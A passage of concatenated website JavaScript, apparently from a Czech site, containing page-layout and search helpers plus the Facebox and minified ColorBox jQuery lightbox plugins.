{var top=(screen.availHeight-height)/2;var left=(screen.availWidth-width)/2;window.open(url,'',"status=0,height="+height+",width="+width+",top="+top+",left="+left+",resizable=1,fullscreen=0,location=0,scrollbars=1",true);}
function bind_article()
{$('blockquote').each(function(){$('>:last',this).addClass('last');});hgt=$('.column').height();act=0;i=0;stop=0;$('.column .box').each(function(){act=act+$(this).height();if(act>=hgt/2&&stop==0){stop=i;$('.column').addClass('small');}
if(stop>0){$(this).remove().clone(true).appendTo('.column.last');}
i++;});}
function bind_effects()
{$('#main-panels dl').hoverIntent(function(){$('#main-panels dl').removeClass('sfhover');$(this).addClass('sfhover');$('#main-panels dl').each(function(){if(!$(this).hasClass('sfhover')){$(this).animate({opacity:0.3},300);}});},function(){$('#main-panels dl').removeClass('sfhover').animate({opacity:1},100);});}
function bind_content()
{$('.excerpt p:last').addClass('last');$('dl>dd>p:first-child>a:first-child>img:first-child').addClass('shift');$('dl>dd>img:first-child').addClass('shift');$('dl>dd>p:first-child>img:first-child').addClass('shift');}
function bind_search()
{$("#searchbox .search-input").focus(function(){$(this).val('');});$('#searchbox form').submit(function(){text=$("#searchbox .search-input").val();if(text.length<4){$.prompt('Zadejte minimálně 3 znaky pro vyhledávání.');return false;}});}
function bind_hover()
{$(".menu li").hover(function(){$(this).addClass("sfhover");},function(){$(this).removeClass("sfhover");});}
function bind_ul()
{$('#main .panel').each(function(){if($('.panel',this).length==0)
$("ul li a",this).after('<strong style="text-decoration: none"> &gt;</strong>');});}
function bind_tabs()
{var tab="tab";$('#main2-right .box').prepend('<ul class="tabs"></ul>')
$('#main2-right .box h3:empty').text($('h1').text());i=0;$('#main2-right .box h3').each(function(){if($(this).text()=="")
$('#main2-right .box>ul').append('<li style="display:none"><a href="#'+tab+i+'">'+$(this).text()+'</a></li>');else
$('#main2-right .box>ul').append('<li><a href="#'+tab+i+'">'+$(this).text()+'</a></li>');$(this).before('<div id='+tab+i+'></div>');while($(this).next().attr("tagName")=="P"){$('#'+tab+i).append($(this).next());}
$('#'+tab+i).prepend(this);i++;});$('#main2-right .box').tabs();$('#index').append($('#main2-right .box>ul'))}
(function($){$.facebox=function(data,klass){$.facebox.loading()
if(data.ajax)fillFaceboxFromAjax(data.ajax)
else if(data.image)fillFaceboxFromImage(data.image)
else if(data.div)fillFaceboxFromHref(data.div)
else if($.isFunction(data))data.call($)
else $.facebox.reveal(data,klass)}
$.extend($.facebox,{settings:{opacity:0.8,overlay:true,loadingImage:'/scripts/facebox/loading.gif',closeImage:'/scripts/facebox/closebox.png',imageTypes:['png','jpg','jpeg','gif'],faceboxHtml:'\
    <div id="facebox" style="display:none;"> \
      <div class="popup"> \
        <table> \
          <tbody> \
            <tr> \
              <td class="tl"/><td class="b"/><td class="tr"/> \
            </tr> \
            <tr> \
              <td class="b"/> \
              <td class="body"> \
                <div class="content"> \
                </div> \
                <div class="footer"> \
                  <a href="#" class="close"> \
                    <img src="/scripts/facebox/closelabel.gif" title="close" class="close_image" /> \
                  </a> \
                </div> \
              </td> \
              <td class="b"/> \
            </tr> \
            <tr> \
              <td class="bl"/><td class="b"/><td class="br"/> \
            </tr> \
          </tbody> \
        </table> \
      </div> \
    </div>'},loading:function(){init()
if($('#facebox .loading').length==1)return true
showOverlay()
$('#facebox .content').empty()
$('#facebox .body').children().hide().end().append('<div class="loading"><img src="'+$.facebox.settings.loadingImage+'"/></div>')
$('#facebox').css({top:getPageScroll()[1]+(getPageHeight()/10),left:385.5}).show()
$(document).bind('keydown.facebox',function(e){if(e.keyCode==27)$.facebox.close()
return true})
$(document).trigger('loading.facebox')},reveal:function(data,klass){$(document).trigger('beforeReveal.facebox')
if(klass)$('#facebox .content').addClass(klass)
$('#facebox .content').append(data)
$('#facebox .loading').remove()
$('#facebox .body').children().fadeIn('normal')
$('#facebox').css('left',$(window).width()/2-($('#facebox table').width()/2))
$(document).trigger('reveal.facebox').trigger('afterReveal.facebox')},close:function(){$(document).trigger('close.facebox')
return false}})
$.fn.facebox=function(settings){init(settings)
function clickHandler(){$.facebox.loading(true)
var klass=this.rel.match(/facebox\[?\.(\w+)\]?/)
if(klass)klass=klass[1]
fillFaceboxFromHref(this.href,klass)
return false}
return this.click(clickHandler)}
function init(settings){if($.facebox.settings.inited)return true
else $.facebox.settings.inited=true
$(document).trigger('init.facebox')
makeCompatible()
var imageTypes=$.facebox.settings.imageTypes.join('|')
$.facebox.settings.imageTypesRegexp=new RegExp('\.'+imageTypes+'$','i')
if(settings)$.extend($.facebox.settings,settings)
$('body').append($.facebox.settings.faceboxHtml)
var preload=[new Image(),new Image()]
preload[0].src=$.facebox.settings.closeImage
preload[1].src=$.facebox.settings.loadingImage
$('#facebox').find('.b:first, .bl, .br, .tl, .tr').each(function(){preload.push(new Image())
preload.slice(-1).src=$(this).css('background-image').replace(/url\((.+)\)/,'$1')})
$('#facebox .close').click($.facebox.close)
$('#facebox .close_image').attr('src',$.facebox.settings.closeImage)}
function getPageScroll(){var xScroll,yScroll;if(self.pageYOffset){yScroll=self.pageYOffset;xScroll=self.pageXOffset;}else if(document.documentElement&&document.documentElement.scrollTop){yScroll=document.documentElement.scrollTop;xScroll=document.documentElement.scrollLeft;}else if(document.body){yScroll=document.body.scrollTop;xScroll=document.body.scrollLeft;}
return new Array(xScroll,yScroll)}
function getPageHeight(){var windowHeight
if(self.innerHeight){windowHeight=self.innerHeight;}else if(document.documentElement&&document.documentElement.clientHeight){windowHeight=document.documentElement.clientHeight;}else if(document.body){windowHeight=document.body.clientHeight;}
return windowHeight}
function makeCompatible(){var $s=$.facebox.settings
$s.loadingImage=$s.loading_image||$s.loadingImage
$s.closeImage=$s.close_image||$s.closeImage
$s.imageTypes=$s.image_types||$s.imageTypes
$s.faceboxHtml=$s.facebox_html||$s.faceboxHtml}
function fillFaceboxFromHref(href,klass){if(href.match(/#/)){var url=window.location.href.split('#')[0]
var target=href.replace(url,'')
$.facebox.reveal($(target).clone().show(),klass)}else if(href.match($.facebox.settings.imageTypesRegexp)){fillFaceboxFromImage(href,klass)}else{fillFaceboxFromAjax(href,klass)}}
function fillFaceboxFromImage(href,klass){var image=new Image()
image.onload=function(){$.facebox.reveal('<div class="image"><img src="'+image.src+'" /></div>',klass)}
image.src=href}
function fillFaceboxFromAjax(href,klass){$.get(href,function(data){$.facebox.reveal(data,klass)})}
function skipOverlay(){return $.facebox.settings.overlay==false||$.facebox.settings.opacity===null}
function showOverlay(){if(skipOverlay())return
if($('facebox_overlay').length==0)
$("body").append('<div id="facebox_overlay" class="facebox_hide"></div>')
$('#facebox_overlay').hide().addClass("facebox_overlayBG").css('opacity',$.facebox.settings.opacity).click(function(){$(document).trigger('close.facebox')}).fadeIn(200)
return false}
function hideOverlay(){if(skipOverlay())return
$('#facebox_overlay').fadeOut(200,function(){$("#facebox_overlay").removeClass("facebox_overlayBG")
$("#facebox_overlay").addClass("facebox_hide")
$("#facebox_overlay").remove()})
return false}
$(document).bind('close.facebox',function(){$(document).unbind('keydown.facebox')
$('#facebox').fadeOut(function(){$('#facebox .content').removeClass().addClass('content')
hideOverlay()
$('#facebox .loading').remove()})})})(jQuery);(function(c){function r(b,d){d=d==="x"?m.width():m.height();return typeof b==="string"?Math.round(b.match(/%/)?d/100*parseInt(b,10):parseInt(b,10)):b}function M(b){b=c.isFunction(b)?b.call(i):b;return a.photo||b.match(/\.(gif|png|jpg|jpeg|bmp)(?:\?([^#]*))?(?:#(\.*))?$/i)}function Y(){for(var b in a)if(c.isFunction(a[b])&&b.substring(0,2)!=="on")a[b]=a[b].call(i);a.rel=a.rel||i.rel;a.href=a.href||i.href;a.title=a.title||i.title}function Z(b){i=b;a=c(i).data(q);Y();if(a.rel&&a.rel!=="nofollow"){g=c(".cboxElement").filter(function(){return(c(this).data(q).rel||this.rel)===a.rel});j=g.index(i);if(j<0){g=g.add(i);j=g.length-1}}else{g=c(i);j=0}if(!B){C=B=n;N=i;N.blur();c(document).bind("keydown.cbox_close",function(d){if(d.keyCode===27){d.preventDefault();e.close()}}).bind("keydown.cbox_arrows",function(d){if(g.length>1)if(d.keyCode===37){d.preventDefault();D.click()}else if(d.keyCode===39){d.preventDefault();E.click()}});a.overlayClose&&s.css({cursor:"pointer"}).one("click",e.close);c.event.trigger(aa);a.onOpen&&a.onOpen.call(i);s.css({opacity:a.opacity}).show();a.w=r(a.initialWidth,"x");a.h=r(a.initialHeight,"y");e.position(0);O&&m.bind("resize.cboxie6 scroll.cboxie6",function(){s.css({width:m.width(),height:m.height(),top:m.scrollTop(),left:m.scrollLeft()})}).trigger("scroll.cboxie6")}P.add(D).add(E).add(t).add(Q).hide();R.html(a.close).show();e.slideshow();e.load()}var q="colorbox",F="hover",n=true,e,x=!c.support.opacity,O=x&&!window.XMLHttpRequest,aa="cbox_open",H="cbox_load",S="cbox_complete",T="resize.cbox_resize",s,k,u,p,U,V,W,X,g,m,l,I,J,K,Q,P,t,E,D,R,y,z,v,w,i,N,j,a,B,C,$={transition:"elastic",speed:350,width:false,height:false,innerWidth:false,innerHeight:false,initialWidth:"400",initialHeight:"400",maxWidth:false,maxHeight:false,scalePhotos:n,scrolling:n,inline:false,html:false,iframe:false,photo:false,href:false,title:false,rel:false,opacity:0.9,preloading:n,current:"image {current} of {total}",previous:"previous",next:"next",close:"close",open:false,overlayClose:n,slideshow:false,slideshowAuto:n,slideshowSpeed:2500,slideshowStart:"start slideshow",slideshowStop:"stop slideshow",onOpen:false,onLoad:false,onComplete:false,onCleanup:false,onClosed:false};e=c.fn.colorbox=function(b,d){var h=this;if(!h.length)if(h.selector===""){h=c("<a/>");b.open=n}else return this;h.each(function(){var f=c.extend({},c(this).data(q)?c(this).data(q):$,b);c(this).data(q,f).addClass("cboxElement");if(d)c(this).data(q).onComplete=d});b&&b.open&&Z(h);return this};e.init=function(){function b(d){return c('<div id="cbox'+d+'"/>')}m=c(window);k=c('<div id="colorbox"/>');s=b("Overlay").hide();u=b("Wrapper");p=b("Content").append(l=b("LoadedContent").css({width:0,height:0}),J=b("LoadingOverlay"),K=b("LoadingGraphic"),Q=b("Title"),P=b("Current"),t=b("Slideshow"),E=b("Next"),D=b("Previous"),R=b("Close"));u.append(c("<div/>").append(b("TopLeft"),U=b("TopCenter"),b("TopRight")),c("<div/>").append(V=b("MiddleLeft"),p,W=b("MiddleRight")),c("<div/>").append(b("BottomLeft"),X=b("BottomCenter"),b("BottomRight"))).children().children().css({"float":"left"});I=c("<div style='position:absolute; top:0; left:0; width:9999px; height:0;'/>");c("body").prepend(s,k.append(u,I));if(x){k.addClass("cboxIE");O&&s.css("position","absolute")}p.children().bind("mouseover mouseout",function(){c(this).toggleClass(F)}).addClass(F);y=U.height()+X.height()+p.outerHeight(n)-p.height();z=V.width()+W.width()+p.outerWidth(n)-p.width();v=l.outerHeight(n);w=l.outerWidth(n);k.css({"padding-bottom":y,"padding-right":z}).hide();E.click(e.next);D.click(e.prev);R.click(e.close);p.children().removeClass(F);c(".cboxElement").live("click",function(d){if(d.button!==0&&typeof d.button!=="undefined")return n;else{Z(this);return false}})};e.position=function(b,d){function h(A){U[0].style.width=X[0].style.width=p[0].style.width=A.style.width;K[0].style.height=J[0].style.height=p[0].style.height=V[0].style.height=W[0].style.height=A.style.height}var f=m.height();f=Math.max(f-a.h-v-y,0)/2+m.scrollTop();var o=Math.max(document.documentElement.clientWidth-a.w-w-z,0)/2+m.scrollLeft();b=k.width()===a.w+w&&k.height()===a.h+v?0:b;u[0].style.width=u[0].style.height="9999px";k.dequeue().animate({width:a.w+w,height:a.h+v,top:f,left:o},{duration:b,complete:function(){h(this);C=false;u[0].style.width=a.w+w+z+"px";u[0].style.height=a.h+v+y+"px";d&&d()},step:function(){h(this)}})};e.resize=function(b){function d(){a.w=a.w||l.width();a.w=a.mw&&a.mw<a.w?a.mw:a.w;return a.w}function h(){a.h=a.h||l.height();a.h=a.mh&&a.mh<a.h?a.mh:a.h;return a.h}function f(G){e.position(G,function(){if(B){if(x){A&&l.fadeIn(100);k[0].style.removeAttribute("filter")}if(a.iframe)l.append("<iframe id='cboxIframe'"+(a.scrolling?" ":"scrolling='no'")+" name='iframe_"+(new Date).getTime()+"' frameborder=0 src='"+a.href+"' "+(x?"allowtransparency='true'":"")+" />");l.show();Q.show().html(a.title);if(g.length>1){P.html(a.current.replace(/\{current\}/,j+1).replace(/\{total\}/,g.length)).show();E.html(a.next).show();D.html(a.previous).show();a.slideshow&&t.show()}J.hide();K.hide();c.event.trigger(S);a.onComplete&&a.onComplete.call(i);a.transition==="fade"&&k.fadeTo(L,1,function(){x&&k[0].style.removeAttribute("filter")});m.bind(T,function(){e.position(0)})}})}if(B){var o,A,L=a.transition==="none"?0:a.speed;m.unbind(T);if(b){l.remove();l=c('<div id="cboxLoadedContent"/>').html(b);l.hide().appendTo(I).css({width:d(),overflow:a.scrolling?"auto":"hidden"}).css({height:h()}).prependTo(p);c("#cboxPhoto").css({cssFloat:"none"});O&&c("select:not(#colorbox select)").filter(function(){return this.style.visibility!=="hidden"}).css({visibility:"hidden"}).one("cbox_cleanup",function(){this.style.visibility="inherit"});a.transition==="fade"&&k.fadeTo(L,0,function(){f(0)})||f(L);if(a.preloading&&g.length>1){b=j>0?g[j-1]:g[g.length-1];o=j<g.length-1?g[j+1]:g[0];o=c(o).data(q).href||o.href;b=c(b).data(q).href||b.href;M(o)&&c("<img />").attr("src",o);M(b)&&c("<img />").attr("src",b)}}else setTimeout(function(){var G=l.wrapInner("<div style='overflow:auto'></div>").children();a.h=G.height();l.css({height:a.h});G.replaceWith(G.children());e.position(L)},1)}};e.load=function(){var b,d,h,f=e.resize;C=n;i=g[j];a=c(i).data(q);Y();c.event.trigger(H);a.onLoad&&a.onLoad.call(i);a.h=a.height?r(a.height,"y")-v-y:a.innerHeight?r(a.innerHeight,"y"):false;a.w=a.width?r(a.width,"x")-w-z:a.innerWidth?r(a.innerWidth,"x"):false;a.mw=a.w;a.mh=a.h;if(a.maxWidth){a.mw=r(a.maxWidth,"x")-w-z;a.mw=a.w&&a.w<a.mw?a.w:a.mw}if(a.maxHeight){a.mh=r(a.maxHeight,"y")-v-y;a.mh=a.h&&a.h<a.mh?a.h:a.mh}b=a.href;J.show();K.show();if(a.inline){c('<div id="cboxInlineTemp" />').hide().insertBefore(c(b)[0]).bind(H+" cbox_cleanup",function(){c(this).replaceWith(l.children())});f(c(b))}else if(a.iframe)f(" ");else if(a.html)f(a.html);else if(M(b)){d=new Image;d.onload=function(){var o;d.onload=null;d.id="cboxPhoto";c(d).css({margin:"auto",border:"none",display:"block",cssFloat:"left"});if(a.scalePhotos){h=function(){d.height-=d.height*o;d.width-=d.width*o};if(a.mw&&d.width>a.mw){o=(d.width-a.mw)/d.width;h()}if(a.mh&&d.height>a.mh){o=(d.height-a.mh)/d.height;h()}}if(a.h)d.style.marginTop=Math.max(a.h-d.height,0)/2+"px";f(d);g.length>1&&c(d).css({cursor:"pointer"}).click(e.next);if(x)d.style.msInterpolationMode="bicubic"};d.src=b}else c("<div />").appendTo(I).load(b,function(o,A){A==="success"?f(this):f(c("<p>Request unsuccessful.</p>"))})};e.next=function(){if(!C){j=j<g.length-1?j+1:0;e.load()}};e.prev=function(){if(!C){j=j>0?j-1:g.length-1;e.load()}};e.slideshow=function(){function b(){t.text(a.slideshowStop).bind(S,function(){h=setTimeout(e.next,a.slideshowSpeed)}).bind(H,function(){clearTimeout(h)}).one("click",function(){d();c(this).removeClass(F)});k.removeClass(f+"off").addClass(f+"on")}var d,h,f="cboxSlideshow_";t.bind("cbox_closed",function(){t.unbind();clearTimeout(h);k.removeClass(f+"off "+f+"on")});d=function(){clearTimeout(h);t.text(a.slideshowStart).unbind(S+" "+H).one("click",function(){b();h=setTimeout(e.next,a.slideshowSpeed);c(this).removeClass(F)});k.removeClass(f+"on").addClass(f+"off")};if(a.slideshow&&g.length>1)a.slideshowAuto?b():d()};e.close=function(){c.event.trigger("cbox_cleanup");a.onCleanup&&a.onCleanup.call(i);B=false;c(document).unbind("keydown.cbox_close keydown.cbox_arrows");m.unbind(T+" resize.cboxie6 scroll.cboxie6");s.css({cursor:"auto"}).fadeOut("fast");k.stop(n,false).fadeOut("fast",function(){c("#colorbox iframe").attr("src","about:blank");l.remove();k.css({opacity:1});try{N.focus()}catch(b){}c.event.trigger("cbox_closed");a.onClosed&&a.onClosed.call(i)})};e.element=function(){return c(i)};e.settings=$;c(e.init)})(jQuery);